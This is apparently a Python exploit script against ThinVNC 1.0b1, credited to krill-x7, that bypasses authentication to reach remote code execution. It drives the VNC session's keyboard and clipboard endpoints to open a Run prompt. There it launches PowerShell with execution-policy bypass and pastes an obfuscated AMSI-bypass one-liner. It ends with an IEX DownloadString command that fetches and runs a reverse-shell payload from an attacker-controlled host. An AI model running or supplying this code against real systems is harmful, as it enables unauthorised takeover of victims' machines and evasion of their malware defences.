import requests import time import argparse import sys import base64 ''' Title: ThinVNC 1.0b1 - Authentication Bypass to RCE Author: krill-x7 ''' ''' You need to create and host a file called rev.ps1 on your attack machine which contains the powershell reverse shell payload that would be executed on the target. ''' parser = argparse.ArgumentParser(description="ThinVNC 1.0b1 - Authentication Bypass to RCE Exploit") parser.add_argument('-t', dest='target', help='Target ip address', required=True) parser.add_argument('-tp', dest='port', help='Target port') parser.add_argument('-a', dest='atk_ip', help='Attacker ip address') parser.add_argument('-ap', dest ='atk_port', help='Attacker port') args = parser.parse_args() target = f'http://{args.target}:{args.port}' headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Connection": "close", } #endpoint_get_sid = '/cmd?cmd=connect&destAddr=poc&id=0' #endpoint_start_sid = f'/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id={sid}' #endpoint_send_ctlEsc = f'/cmd?cmd=fkey&key=CtrlEsc&id={sid}' #endpoint_send_cmd = f'/cmd?id={sid}&cmd=cli&type=clipboard&action=paste' #endpoint_send_enter = f'/cmd?cmd=keyb&key=13&char=0&action=down&id={sid}' cookies = {'SID':''} def get_sid(): url = target+'/cmd?cmd=connect&destAddr=poc&id=0' response = requests.get(url, headers=headers, cookies=cookies) #print(response.text) sid = response.json()['id'] cookies['SID'] = sid return sid def start_sid(sid): url = target+f'/cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id={sid}' response = requests.get(url, headers=headers, cookies=cookies) #print(response.text) if response.status_code != 200: print(f"[!] The server returned {response.status_code}") sys.exit() else: print(f"[+] SID {sid} started successfully.") time.sleep(2) def send_ctrlEsc(sid): url = target+f'/cmd?cmd=fkey&key=CtrlEsc&id={sid}' response = requests.post(url, headers=headers, cookies=cookies) #print(response.text) if response.status_code != 200: print(f"[!] The server returned {response.status_code}") sys.exit() else: print(f"\n[+] Sending Ctrl + Esc to {sid}") time.sleep(1) print(" -> sent") time.sleep(1) def send_cmd(sid, cmd): url = target+f'/cmd?id={sid}&cmd=cli&type=clipboard&action=paste' response = requests.post(url, headers=headers, cookies=cookies, data=cmd) #print(response.text) if response.status_code != 200: print(f"[!] The server returned {response.status_code}") sys.exit() else: print(f"\n[+] Sending command: `{cmd}` to SID:{sid}") time.sleep(1) send_enter(sid) def send_enter(sid): url = target+f'/cmd?cmd=keyb&key=13&char=0&action=down&id={sid}' response = requests.get(url, headers=headers, cookies=cookies) #print(response.text) if response.status_code != 200: print(f"[!] The server returned {response.status_code}") sys.exit() else: print(" -> sent") time.sleep(2) def main(): print("Welcome to the land of the living") sid = get_sid() start_sid(sid) send_ctrlEsc(sid) print("\ntime to chain") send_cmd(sid,'run') amsi_txt = """powershell.exe -exec bypass""" send_cmd(sid, amsi_txt) amsi_txt = """S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )""" send_cmd(sid,amsi_txt) print("\n[+] Executing reverse shell payload ") shell = f"IEX((New-Object System.Net.WebClient).DownloadString('http://{args.atk_ip}:{args.atk_port}/rev.ps1'))" send_cmd(sid, shell) if __name__ == "__main__": main() # nothing happens here :)